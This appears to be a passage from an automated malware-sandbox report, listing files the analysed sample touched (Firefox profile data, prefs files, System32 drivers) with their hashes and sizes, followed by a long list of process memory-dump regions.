41fcc4cad34489e964333b64ef85e11f

SHA1
8e504718ad69ffec4380ff749b1d03f66cda7a34

SHA256
15a54031f9df381ebc11fe0f9be0680d22d8d351fc619136f0c58270faddfcec

SHA512
9d74c6965befc823d7268ffa124f2594b4f801d354535568f79c94c668618baa0f0bc3630fe07a9b2ba5b9fdfc23b38744df99a84ead19fe9d84cdfab8c97148

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\datareporting\glean\db\data.safe.tmp

Filesize
7KB

MD5
99199466ecd804a67b50e0a3e7439723

SHA1
bf5ad157c366253bddef4b9075ea40ae95474794

SHA256
84bfda78b60486527fc1f57fe07e17a2777d52d5b26f72453b5bdc9187b5088d

SHA512
4f3fed828cdcf5c799ecda738c7b9b63658ce703f4219584780fa6de3f4b8914e24e7d3bd133409d0857c0be576b488917e84b94e7e53f4e40ecce662698b6e5

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\datareporting\glean\events\events

Filesize
1KB

MD5
5c3b30f1dc2f91fcf446b1a4f94593d2

SHA1
0d5f4e83043a6fd8abdf39fdc6ca24346fd4913e

SHA256
b88ab7e4f73b0a97fea7ba89c0fa65689e9500d212e1c075225f0ba0e772ada0

SHA512
0bff8b9a05441e456a335cfeb630f82e2c29f7f9790667aaf4805fe5d6a63a45bdf56532e0bca877e2f0b1f3edc9d7e27bb738b74d86377dc47e767ccbb8971c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\datareporting\glean\pending_pings\22a6133c-3b22-4dce-addd-6ba06c793b82

Filesize
16KB

MD5
8b9a4b9280cf1907f68172d62fd4e9cf

SHA1
b1e9fe08b598addfe44c48b4a0ec928535354665

SHA256
346abd38531f8a68e31a3561736ee96b156884694fca5bb087a61bf44ad3808b

SHA512
df54ed3dbe94100ecd50ac4433cfe08cd38fad553384529d5853f19f896fe3c1f55c513cc462f6a6282dae9703afa90fe7ac6dd4334de66f868ad0576dd16021

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\datareporting\glean\pending_pings\9866c345-997f-4148-a270-0aa33b03a780

Filesize
883B

MD5
61d814932751140566883c761004bab1

SHA1
d9e79f5f825766721b477e3a256344796ea0e464

SHA256
4aba903a98b6fbe526e556bbcbf63c4792c3267d86323b71d95184656ab63e39

SHA512
a65d2ecfda0c326ce951c1fef95b708625b2a796552d6d2f722f0c490ae1db695f0e76e41afb533b4462f3c2774605158c1f0de368eb4f2121d24edaabc7eed4

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\datareporting\glean\pending_pings\9ba08746-640d-4e71-81bf-08f555170af9

Filesize
2KB

MD5
9ac98d9bae0c907ea38f5e032f22648b

SHA1
fa7b05a694f17e55bb80db42111cc5a32326b1d9

SHA256
179ef709482ead32ef948f98e594367e44a8b46042e8fbd0941690b9d866167d

SHA512
61cca27602d099ff1d266a4f40e89343ae635dbe526fce83874d758b8c16e845925f890297a7eca6c2aa3f758f270271893ecdb1c9c6553fcbe0c7d0d3ac83ce

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\datareporting\glean\pending_pings\a99e67e8-0dd1-4361-813a-d6e82994b56f

Filesize
235B

MD5
df84083dc1b3ea08111771d4bc5d53e9

SHA1
bb08269b9c1ded414343b8db98a66c84e9362ddc

SHA256
65ab97f0c31440295ae2c98e093d876e0c51bc4cd6455a04aae27805dd6f3e9d

SHA512
1010546186376f96da39764443006c4eb2517c07b4ef7654291dbc320117b44e78cc29c304be20c49623470e909042c6cabf582f44184a1ebea6d2a18a822783

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\datareporting\glean\pending_pings\b9189b27-db8d-42d5-8e5b-6076ed3c7619

Filesize
886B

MD5
91f6f20507be59b9fec074192fab4aa1

SHA1
1fbcb86ad80627ea4bb2f5e272c7c9e0bc65f848

SHA256
cd68de29e433cc3fd87cbfe9c5b908a503138bb25717278dcf82a8fa9e910c33

SHA512
ede565703b6962196a8b5c518aaba4802d0e3b1fe885c7582fb7934be1b6419cd520e571ad0d7b10683e18b1e0e7750ab69471024f049a73dd6e40c1ed3f0281

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\datareporting\glean\pending_pings\d620c46b-09b5-45c9-9a5c-32dc4eb28c33

Filesize
235B

MD5
ffb2fa67e272f9fab317edd09758ef48

SHA1
2cc6d9ef24f271e33fac141f3817dea103da11fc

SHA256
0a74717e856e176be6f5736179de24e3da10376994ee263ff5a3dc04937f9037

SHA512
a5740a2f37bf7b90140a1e20eedc00964ebafeb240507d3cb801b6f386bff25cb5421e72789b360d892505db35477f7d16cb6dab1d6e693771545d1c75eb888c

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\prefs-1.js

Filesize
6KB

MD5
3f1c53aad8faf6b3e63acc14126a8e9d

SHA1
8c04e1109314fb1bc314ae458eaaae759497d9a8

SHA256
b12819e3bff91d9470f9fc2d8f652ec5d783051d0ef66e24a2229c83310687dc

SHA512
691073ad39391e9bd9b98d5e0f393d85b6b4c16fd54fef6342a5b3e15ab8f594c5bdf15ccbfdab1397171cb438a32c0fafc63ed3115425e3d21bf7c89a7dabeb

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\3xhpu52e.default-release\prefs.js

Filesize
6KB

MD5
eb7a755b48922c8165830813ba61e81b

SHA1
c6149984dd198c17f11335eae849b636802d3364

SHA256
dd9879fd134fcf30ca20410c008dd9b421c7f58ff95ce5aa7898f83003d69640

SHA512
9f88f48976f2cba3c8073e20a0a11c2350ffab0c006f35e662a61f5c3ba511b6b0d5806f343cceab26166f86fc0cbeaba2c3a27bf5270410e51822837757592c

Download Submit
C:\Windows\System32\drivers\klupd_b296ad91a_klark.sys

Filesize
355KB

MD5
9cfe1ced0752035a26677843c0cbb4e3

SHA1
e8833ac499b41beb6763a684ba60333cdf955918

SHA256
3bdb393dfaa63b9650658d9288a1dc9a62acc0d44c2f5eab9170485356b9b634

SHA512
29e912e7e19f5ca984fb36fc38df87ed9f8eaa1b62fd0c21d75cbc7b7f16a441de3a97c40a813a8989953ff7c4045d6173066be2a6e6140c90325546b3d0773c

Download Submit
C:\Windows\System32\drivers\klupd_b296ad91a_klbg.sys

Filesize
199KB

MD5
424b93cb92e15e3f41e3dd01a6a8e9cc

SHA1
2897ab04f69a92218bfac78f085456f98a18bdd3

SHA256
ccb99a2eeb80cd74cc58691e7af7fce3264b941aea3d777d9e4a950b9e70b82e

SHA512
15e984a761d873eef0ab50f8292fbba771208ff97a57b131441666c6628936c29f8b1f0e04ef8e880f33ef6fccebd20db882997ca3504c9e5ea1db781b9ffb0f

Download Submit
C:\Windows\System32\drivers\klupd_b296ad91a_mark.sys

Filesize
260KB

MD5
66522d67917b7994ddfb5647f1c3472e

SHA1
f341b9b28ca7ac21740d4a7d20e4477dba451139

SHA256
5da15bcd1ad66b56b73994a073e8f0ff4170b9ed09c575ca1b046a59a01cc8a1

SHA512
921babab093c5bd1e0ec1615c8842081b402a491ecc744613929fa5fafde628cd9bcc1b38b70024a8fa4317aea0b0dce71cd19f44103e50d6ed7a8d9e2a55968

Download Submit
memory/1828-31383-0x0000000000A50000-0x00000000010F5000-memory.dmp

Filesize
6.6MB

Download
memory/1828-31756-0x0000000000A50000-0x00000000010F5000-memory.dmp

Filesize
6.6MB

Download
memory/1936-61-0x0000000000400000-0x0000000000463000-memory.dmp

Filesize
396KB

Download
memory/1936-62-0x0000000000400000-0x0000000000463000-memory.dmp

Filesize
396KB

Download
memory/1968-2-0x0000000000761000-0x00000000007CD000-memory.dmp

Filesize
432KB

Download
memory/1968-17-0x0000000000760000-0x0000000000BF3000-memory.dmp

Filesize
4.6MB

Download
memory/1968-3-0x0000000000760000-0x0000000000BF3000-memory.dmp

Filesize
4.6MB

Download
memory/1968-1-0x0000000077B84000-0x0000000077B86000-memory.dmp

Filesize
8KB

Download
memory/1968-4-0x0000000000760000-0x0000000000BF3000-memory.dmp

Filesize
4.6MB

Download
memory/1968-18-0x0000000000761000-0x00000000007CD000-memory.dmp

Filesize
432KB

Download
memory/1968-0-0x0000000000760000-0x0000000000BF3000-memory.dmp

Filesize
4.6MB

Download
memory/2408-42-0x0000000000400000-0x0000000000463000-memory.dmp

Filesize
396KB

Download
memory/2408-40-0x0000000000400000-0x0000000000463000-memory.dmp

Filesize
396KB

Download
memory/2408-43-0x0000000000400000-0x0000000000463000-memory.dmp

Filesize
396KB

Download
memory/2408-45-0x0000000000400000-0x0000000000463000-memory.dmp

Filesize
396KB

Download
memory/3256-83-0x0000000000400000-0x000000000068D000-memory.dmp

Filesize
2.6MB

Download
memory/3260-94-0x000001B740980000-0x000001B7409F1000-memory.dmp

Filesize
452KB

Download
memory/3260-95-0x000001B740980000-0x000001B7409F1000-memory.dmp

Filesize
452KB

Download
memory/3260-86-0x000001B740980000-0x000001B7409F1000-memory.dmp

Filesize
452KB

Download
memory/3260-93-0x000001B740980000-0x000001B7409F1000-memory.dmp

Filesize
452KB

Download
memory/3260-85-0x00000000008D0000-0x00000000008D2000-memory.dmp

Filesize
8KB

Download
memory/3856-44-0x0000000000220000-0x00000000006B3000-memory.dmp

Filesize
4.6MB

Download
memory/3856-20-0x0000000000221000-0x000000000028D000-memory.dmp

Filesize
432KB

Download
memory/3856-19-0x0000000000220000-0x00000000006B3000-memory.dmp

Filesize
4.6MB

Download
memory/3856-21-0x0000000000220000-0x00000000006B3000-memory.dmp

Filesize
4.6MB

Download
memory/3856-22-0x0000000000220000-0x00000000006B3000-memory.dmp

Filesize
4.6MB

Download
memory/3856-46-0x0000000000220000-0x00000000006B3000-memory.dmp

Filesize
4.6MB

Download
memory/3856-23-0x0000000000220000-0x00000000006B3000-memory.dmp

Filesize
4.6MB

Download
memory/3856-108-0x0000000000220000-0x00000000006B3000-memory.dmp

Filesize
4.6MB

Download
memory/3856-39-0x0000000000220000-0x00000000006B3000-memory.dmp

Filesize
4.6MB

Download
memory/3856-38-0x0000000000221000-0x000000000028D000-memory.dmp

Filesize
432KB

Download
memory/4852-25768-0x0000000000400000-0x000000000040E000-memory.dmp

Filesize
56KB

Download
memory/5764-127-0x0000000000870000-0x00000000009F8000-memory.dmp

Filesize
1.5MB

Download
memory/5764-129-0x0000000000870000-0x00000000009F8000-memory.dmp

Filesize
1.5MB

Download
memory/5764-123-0x0000000000870000-0x00000000009F8000-memory.dmp

Filesize
1.5MB

Download
memory/5764-125-0x0000000000870000-0x00000000009F8000-memory.dmp

Filesize
1.5MB

Download
memory/5764-128-0x0000000000870000-0x00000000009F8000-memory.dmp

Filesize
1.5MB

Download
memory/5764-120-0x0000000000870000-0x00000000009F8000-memory.dmp

Filesize
1.5MB

Download
memory/5764-119-0x0000000000870000-0x00000000009F8000-memory.dmp

Filesize
1.5MB

Download
memory/5764-117-0x0000000140000000-0x0000000140436000-memory.dmp

Filesize
4.2MB

Download
memory/5764-126-0x0000000000870000-0x00000000009F8000-memory.dmp

Filesize
1.5MB

Download
memory/5764-124-0x0000000000870000-0x00000000009F8000-memory.dmp

Filesize
1.5MB

Download
memory/5764-122-0x0000000000870000-0x00000000009F8000-memory.dmp

Filesize
1.5MB

Download
memory/5764-121-0x0000000000870000-0x00000000009F8000-memory.dmp

Filesize
1.5MB

Download
memory/6124-96-0x00000191C5850000-0x00000191C5872000-memory.dmp

Filesize
136KB

Download
memory/6412-25772-0x0000000071040000-0x0000000071620000-memory.dmp

Filesize
5.9MB

Download
memory/6412-25714-0x00000000036A0000-0x00000000036B0000-memory.dmp

Filesize
64KB

Download
memory/6412-25696-0x0000000000F40000-0x000000000152C000-memory.dmp

Filesize
5.9MB

Download
memory/6412-25697-0x0000000006450000-0x00000000069F4000-memory.dmp

Filesize
5.6MB

Download
memory/6412-25698-0x0000000005DE0000-0x0000000005E72000-memory.dmp

Filesize
584KB

Download
memory/6412-25737-0x000000000A3B0000-0x000000000A402000-memory.dmp

Filesize
328KB

Download
memory/6412-25706-0x0000000071040000-0x0000000071620000-memory.dmp

Filesize
5.9MB

Download
memory/6412-25711-0x0000000006020000-0x000000000602A000-memory.dmp

Filesize
40KB

Download
memory/6412-25717-0x0000000071040000-0x0000000071620000-memory.dmp

Filesize
5.9MB

Download
memory/6412-25712-0x0000000009510000-0x00000000095AC000-memory.dmp

Filesize
624KB

Download
memory/6412-25713-0x0000000009470000-0x00000000094DA000-memory.dmp

Filesize
424KB

Download
memory/6832-33515-0x0000000000400000-0x0000000000E1C000-memory.dmp

Filesize
10.1MB

Download
memory/6832-33193-0x0000000000400000-0x0000000000E1C000-memory.dmp

Filesize
10.1MB

Download
memory/7208-28681-0x000001CBCC080000-0x000001CBCC0F6000-memory.dmp

Filesize
472KB

Download
memory/7208-28680-0x000001CBCC030000-0x000001CBCC074000-memory.dmp

Filesize
272KB

Download
memory/7372-25733-0x0000000000220000-0x00000000006B3000-memory.dmp

Filesize
4.6MB

Download
memory/7372-25735-0x0000000000220000-0x00000000006B3000-memory.dmp

Filesize
4.6MB

Download
memory/7944-25829-0x0000000007350000-0x000000000736A000-memory.dmp

Filesize
104KB

Download
memory/7944-25810-0x00000000712B0000-0x00000000712FC000-memory.dmp

Filesize
304KB

Download
memory/7944-25760-0x00000000023F0000-0x0000000002426000-memory.dmp

Filesize
216KB

Download
memory/7944-25762-0x0000000004EC0000-0x00000000054E8000-memory.dmp

Filesize
6.2MB

Download
memory/7944-25770-0x0000000005620000-0x0000000005686000-memory.dmp

Filesize
408KB

Download
memory/7944-25771-0x0000000005690000-0x00000000056F6000-memory.dmp

Filesize
408KB

Download
memory/7944-25769-0x0000000004E50000-0x0000000004E72000-memory.dmp

Filesize
136KB

Download
memory/7944-25773-0x0000000005700000-0x0000000005A54000-memory.dmp

Filesize
3.3MB

Download
memory/7944-25787-0x0000000005CF0000-0x0000000005D0E000-memory.dmp

Filesize
120KB

Download
memory/7944-25788-0x0000000005D20000-0x0000000005D6C000-memory.dmp

Filesize
304KB

Download
memory/7944-25820-0x0000000006280000-0x000000000629E000-memory.dmp

Filesize
120KB

Download
memory/7944-25809-0x0000000006230000-0x0000000006262000-memory.dmp

Filesize
200KB

Download
memory/7944-25821-0x0000000006EF0000-0x0000000006F93000-memory.dmp

Filesize
652KB

Download
memory/7944-25822-0x0000000007620000-0x0000000007C9A000-memory.dmp

Filesize
6.5MB

Download
memory/7944-25823-0x0000000006FA0000-0x0000000006FBA000-memory.dmp

Filesize
104KB

Download
memory/7944-25824-0x0000000007010000-0x000000000701A000-memory.dmp

Filesize
40KB

Download
memory/7944-25825-0x0000000007220000-0x00000000072B6000-memory.dmp

Filesize
600KB

Download
memory/7944-25826-0x00000000071A0000-0x00000000071B1000-memory.dmp

Filesize
68KB

Download
memory/7944-25827-0x0000000007210000-0x000000000721E000-memory.dmp

Filesize
56KB

Download
memory/7944-25830-0x0000000007340000-0x0000000007348000-memory.dmp

Filesize
32KB

Download
memory/7944-25828-0x0000000007300000-0x0000000007314000-memory.dmp

Filesize
80KB

Download
memory/8064-30761-0x0000000000220000-0x00000000006B3000-memory.dmp

Filesize
4.6MB

Download
memory/8064-30757-0x0000000000220000-0x00000000006B3000-memory.dmp

Filesize
4.6MB

Download
memory/8520-27085-0x0000000009A10000-0x0000000009EA6000-memory.dmp

Filesize
4.6MB

Download
memory/8520-27300-0x00000000070D0000-0x0000000007126000-memory.dmp

Filesize
344KB

Download
memory/9032-31029-0x0000000000840000-0x0000000000CD4000-memory.dmp

Filesize
4.6MB

Download
memory/9032-30785-0x0000000000840000-0x0000000000CD4000-memory.dmp

Filesize
4.6MB

Download
memory/9124-28857-0x0000000000290000-0x0000000000D1E000-memory.dmp

Filesize
10.6MB

Download
memory/9124-28855-0x0000000000290000-0x0000000000D1E000-memory.dmp

Filesize
10.6MB

Download
memory/9164-28654-0x0000019B21330000-0x0000019B21384000-memory.dmp

Filesize
336KB

Download
memory/9164-28648-0x0000019B21020000-0x0000019B21076000-memory.dmp

Filesize
344KB

Download
memory/9164-25837-0x0000019B06B80000-0x0000019B06C28000-memory.dmp

Filesize
672KB

Download
memory/9164-28651-0x0000019B211E0000-0x0000019B2122C000-memory.dmp

Filesize
304KB

Download
memory/9164-25838-0x0000019B210D0000-0x0000019B211DA000-memory.dmp

Filesize
1.0MB

Download
memory/9276-31032-0x0000000000400000-0x0000000000870000-memory.dmp

Filesize
4.4MB

Download
memory/9276-30756-0x0000000000400000-0x0000000000870000-memory.dmp

Filesize
4.4MB

Download
memory/11084-33569-0x0000000000400000-0x0000000000CFF000-memory.dmp

Filesize
9.0MB

Download
memory/12684-31757-0x0000000000D10000-0x000000000117A000-memory.dmp

Filesize
4.4MB

Download
memory/12684-31759-0x0000000000D10000-0x000000000117A000-memory.dmp

Filesize
4.4MB

Download
memory/12684-31758-0x0000000000D10000-0x000000000117A000-memory.dmp

Filesize
4.4MB

Download
memory/12684-33109-0x0000000000D10000-0x000000000117A000-memory.dmp

Filesize
4.4MB

Download
memory/12684-32783-0x0000000000D10000-0x000000000117A000-memory.dmp

Filesize
4.4MB

Download